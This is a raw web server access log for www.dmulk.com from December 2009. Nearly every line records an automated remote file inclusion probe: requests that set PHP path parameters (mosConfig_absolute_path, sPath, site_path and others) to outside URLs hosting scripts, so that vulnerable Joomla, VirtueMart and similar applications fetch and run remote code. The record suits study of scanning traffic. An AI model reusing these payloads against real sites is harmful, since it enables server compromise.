68.104.28.131 - - [13/Dec/2009:11:28:45 -0800] "GET /bikes/2k6klr650/klr004.JPG HTTP/1.0" 200 216057 "http://www.st-owners.com/forums/showthread.php?t=72916" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:29:19 -0800] "GET /logs/access_091124.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:29:52 -0800] "GET /logs/access_091124.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:29:59 -0800] "GET /logs/access_091124.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:11:30:06 -0800] "GET /logs/prodler.class.php?sPath=http://www.reunionnais2france.com/plugins/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:11:30:06 -0800] "GET /prodler.class.php?sPath=http://www.reunionnais2france.com/plugins/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:11:30:06 -0800] "GET /logs/access_091124.log%20%20/prodler.class.php?sPath=http://www.reunionnais2france.com/plugins/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:30:08 -0800] "GET /logs/access_090616.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:30:08 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:30:09 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:11 -0800] "GET /logs/access_091119.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:30:13 -0800] "GET /logs/access_090522.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:30:14 -0800] "GET /include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:30:14 -0800] "GET /logs//include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:30:14 -0800] "GET /logs/access_090326.log%20%20//include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:19 -0800] "GET /logs/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:19 -0800] "GET /prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:19 -0800] "GET /logs/access_091124.log/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:19 -0800] "GET /prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:19 -0800] "GET /logs/access_091124.log/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:19 -0800] "GET /logs/prodler.class.php?sPath=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.203.208.203 - - [13/Dec/2009:11:30:21 -0800] "GET /logs/access_081129.log%20%20///?_zb_path=http://www.zywesrebro.pl/fotki/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:35 -0800] "GET /logs/access_091124.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:11:30:38 -0800] "GET /phphtml.php?htmlclass_path=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:11:30:38 -0800] "GET /logs/phphtml.php?htmlclass_path=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:11:30:39 -0800] "GET /logs/access_090130.log/phphtml.php?htmlclass_path=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.140.176 - - [13/Dec/2009:11:30:40 -0800] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://teamirc.no-ip.org/karma/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:30:50 -0800] "GET /logs/access_080919.log%20%20//include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:30:51 -0800] "GET /include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:30:51 -0800] "GET /logs/access_090326.log%20%20//include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:30:51 -0800] "GET /logs//include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.75.250.70 - - [13/Dec/2009:11:30:55 -0800] "GET /logs/access_091009.log HTTP/1.1" 200 1507328 "-" "kak1khqpbC 1hsyhhwcmmmddrrgwyfs1hce" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:30:58 -0800] "GET /logs/access_090523.log/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:30:59 -0800] "GET /logs/access_091119.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:31:13 -0800] "GET /logs/access_080906.log/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.5.74.92 - - [13/Dec/2009:11:31:25 -0800] "GET /logs/access_080919.log%20%20//include/lib.inc.php?site_path=http://bobbydonut.com/stephanie/id11.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:31:27 -0800] "GET /logs/access_090523.log/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:11:31:46 -0800] "GET /logs/access_080906.log/common/func.php?CommonAbsDir=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:33:35 -0800] "GET /logs/access_090616.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:33:35 -0800] "GET /logs/access_090513.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:33:40 -0800] "GET /logs/access_091119.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:33:40 -0800] "GET /koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:33:40 -0800] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:33:40 -0800] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:33:40 -0800] "GET /koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:33:40 -0800] "GET /logs/access_091119.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:33:52 -0800] "GET /logs/access_091124.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:34:07 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:34:07 -0800] "GET /logs/access_080512.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:34:07 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [13/Dec/2009:11:34:11 -0800] "GET /logs/access_090627.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.buchanansat.com/includes/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:34:25 -0800] "GET /logs/access_091130.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:34:30 -0800] "GET /logs/access_091124.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:34:32 -0800] "GET /logs/access_091124.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:34:49 -0800] "GET /logs/access_091119.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:35:11 -0800] "GET /logs/access_091124.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:35:32 -0800] "GET /logs/access_091119.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:35:49 -0800] "GET /logs/access_091130.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:39:16 -0800] "GET /logs/access_091130.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:25 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:25 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:25 -0800] "GET /logs/access_080702.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:30 -0800] "GET /logs/access_080319.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /logs/access_080702.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /logs/access_080702.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /logs/access_080319.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:47 -0800] "GET /logs/access_080319.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:48 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:48 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:48 -0800] "GET /logs/access_080702.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:48 -0800] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:48 -0800] "GET /logs/access_080702.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:48 -0800] "GET /logs/access_080319.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:48 -0800] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:11:39:49 -0800] "GET /logs/access_080319.log%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://withkor.net/snapshot/lo1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.246.39.167 - - [13/Dec/2009:11:39:55 -0800] "GET /logs/access_091130.log/koesubmit.php?mosConfig_absolute_path=http://www.lafranceenaction.com/.../zxc.sql? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:39:58 -0800] "GET /logs/access_091007.log//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:40:16 -0800] "GET /logs/access_090408.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:40:17 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:40:19 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 200 14921 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:40:22 -0800] "GET /logs/access_091124.log/prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:40:22 -0800] "GET /logs/prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:40:30 -0800] "GET /prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.19 - - [13/Dec/2009:11:40:33 -0800] "GET /logs/access_091007.log//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:40:38 -0800] "GET /logs/access_090902.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:41:23 -0800] "GET /logs/access_081029.log/?_SERVER[DOCUMENT_ROOT]=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:41:39 -0800] "GET /koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:41:48 -0800] "GET /logs/access_091124.log%20%20/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:41:48 -0800] "GET /logs/koesubmit.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:42:22 -0800] "GET /prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:42:22 -0800] "GET /logs/prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:42:30 -0800] "GET /logs/access_091124.log/prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.252.149.13 - - [13/Dec/2009:11:42:41 -0800] "GET /logs/access_080123.log HTTP/1.1" 200 638144 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /logs/access_081029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /logs/access_081201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /logs/access_081029.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.158.176.210 - - [13/Dec/2009:11:43:45 -0800] "GET /logs/access_081201.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://vrim.org/bbs//script/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:43:49 -0800] "GET /magazine.html.php?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:43:49 -0800] "GET /logs/access_090510.log%20%20/magazine.html.php?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:43:49 -0800] "GET /logs/magazine.html.php?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
72.32.125.181 - - [13/Dec/2009:11:43:50 -0800] "GET /logs/access_090511.log%20%20/magazine.html.php?mosConfig_absolute_path=http://www.urkniga.ru/images/banner4.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:43:51 -0800] "GET /logs/access_090430.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:44:11 -0800] "GET /prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:44:18 -0800] "GET /logs/prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [13/Dec/2009:11:44:19 -0800] "GET /logs/access_091124.log%20%20/prodler.class.php?sPath=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:11:44:21 -0800] "GET /logs/access_090403.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
